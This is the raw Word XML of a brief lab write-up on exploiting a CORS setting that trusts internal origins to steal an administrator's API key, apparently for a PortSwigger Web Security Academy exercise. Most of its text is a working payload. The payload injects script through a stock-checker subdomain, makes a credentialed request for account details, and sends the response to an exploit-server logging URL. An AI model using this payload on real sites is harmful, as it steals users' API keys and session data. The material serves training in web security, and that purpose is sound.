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07E0" w14:textId="32C78108" w:rsidR="00320924" w:rsidRDefault="00821258" w:rsidP="00821258">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="00821258">
        <w:t>SCENARIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688C087E" w14:textId="3F2B142C" w:rsidR="00821258" w:rsidRPr="00F10577" w:rsidRDefault="00F10577" w:rsidP="0077760B">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>The application has an insecure CORS configuration in it which forces the application to</w:t>
      </w:r>
      <w:r w:rsidR="00925007" w:rsidRPr="00925007">
        <w:t xml:space="preserve"> trust </w:t>
      </w:r>
      <w:r w:rsidR="004D3681" w:rsidRPr="004D3681">
        <w:t>all internal network origins.</w:t>
      </w:r>
      <w:r w:rsidR="00566E4F">
        <w:t xml:space="preserve"> We’ll try to exploit the vulnerability by getting the administrator’s API key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0DB152" w14:textId="77777777" w:rsidR="00821258" w:rsidRDefault="00821258" w:rsidP="008212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1F4DB11" w14:textId="107FC522" w:rsidR="00821258" w:rsidRDefault="00821258" w:rsidP="008212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24EE9113" w14:textId="0F842CB8" w:rsidR="00EA0204" w:rsidRPr="00812F80" w:rsidRDefault="00261147" w:rsidP="00812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vulnerable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>applica</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D3E1450" w14:textId="77777777" w:rsidR="00821258" w:rsidRDefault="00821258" w:rsidP="008212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9E9606D" w14:textId="060C24D7" w:rsidR="00C91309" w:rsidRPr="00C91309" w:rsidRDefault="00821258" w:rsidP="00C913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4A8B777A" w14:textId="3069636C" w:rsidR="004D4B30" w:rsidRDefault="00C91309" w:rsidP="00C913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91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Origin: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00735DD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
          </w:rPr>
          <w:t>http://subdomain.0a3a003f0447826980e421de003d0046.web-security-academy.net/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1BF6C7D0" w14:textId="77777777" w:rsidR="00C91309" w:rsidRPr="00C91309" w:rsidRDefault="00C91309" w:rsidP="00C913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91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655C30B4" w14:textId="77777777" w:rsidR="00C91309" w:rsidRPr="00C91309" w:rsidRDefault="00C91309" w:rsidP="00C9130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91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">    document.location="http://stock.YOUR-LAB-ID.web-security-academy.net/?productId=4&lt;script&gt;var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C91309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Pr="00C91309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C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">(); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>req.onload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C9130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C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>reqListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">; req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>req.withCredentials</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C9130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C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>true;req.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">();function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>reqListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>() {location='https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='%2bthis.responseText; };%3c/script&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>storeId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>=1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A70BFA2" w14:textId="1CC567CC" w:rsidR="00C91309" w:rsidRDefault="00C91309" w:rsidP="00C9130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91309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBB82E0" w14:textId="1AEE0D72" w:rsidR="00821258" w:rsidRDefault="00821258" w:rsidP="004D4B3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ED8ABC7" w14:textId="14A6851D" w:rsidR="00821258" w:rsidRPr="00821258" w:rsidRDefault="00821258" w:rsidP="008212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sectPr w:rsidR="00821258" w:rsidRPr="00821258" w:rsidSect="008212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D530F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="237CB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255C8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18A49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331106">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1088160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48"/>
    <w:rsid w:val="00054454"/>
    <w:rsid w:val="00061867"/>
    <w:rsid w:val="000E0652"/>
    <w:rsid w:val="001D5FBD"/>
    <w:rsid w:val="001E4757"/>
    <w:rsid w:val="00261147"/>
    <w:rsid w:val="002F2030"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="003606DC"/>
    <w:rsid w:val="00366E5F"/>
    <w:rsid w:val="00416927"/>
    <w:rsid w:val="004D3681"/>
    <w:rsid w:val="004D4B30"/>
    <w:rsid w:val="004F2D48"/>
    <w:rsid w:val="00566E4F"/>
    <w:rsid w:val="0077760B"/>
    <w:rsid w:val="007B6F3D"/>
    <w:rsid w:val="00812F80"/>
    <w:rsid w:val="00821258"/>
    <w:rsid w:val="008F594F"/>
    <w:rsid w:val="00925007"/>
    <w:rsid w:val="009D2559"/>
    <w:rsid w:val="00A02736"/>
    <w:rsid w:val="00A24E66"/>
    <w:rsid w:val="00A630A0"/>
    <w:rsid w:val="00A912A1"/>
    <w:rsid w:val="00BC753C"/>
    <w:rsid w:val="00C91309"/>
    <w:rsid w:val="00C92793"/>
    <w:rsid w:val="00DA161C"/>
    <w:rsid w:val="00E2662F"/>
    <w:rsid w:val="00EA0204"/>
    <w:rsid w:val="00F10577"/>
    <w:rsid w:val="00F216A1"/>
    <w:rsid w:val="00F2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C5E5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{77BD95C2-9AF3-456C-A9A0-314555A1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258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821258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77760B"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"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77760B"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"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776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3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ubdomain.0a3a003f0447826980e421de003d0046.web-security-academy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7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-20T06:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-20T06:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>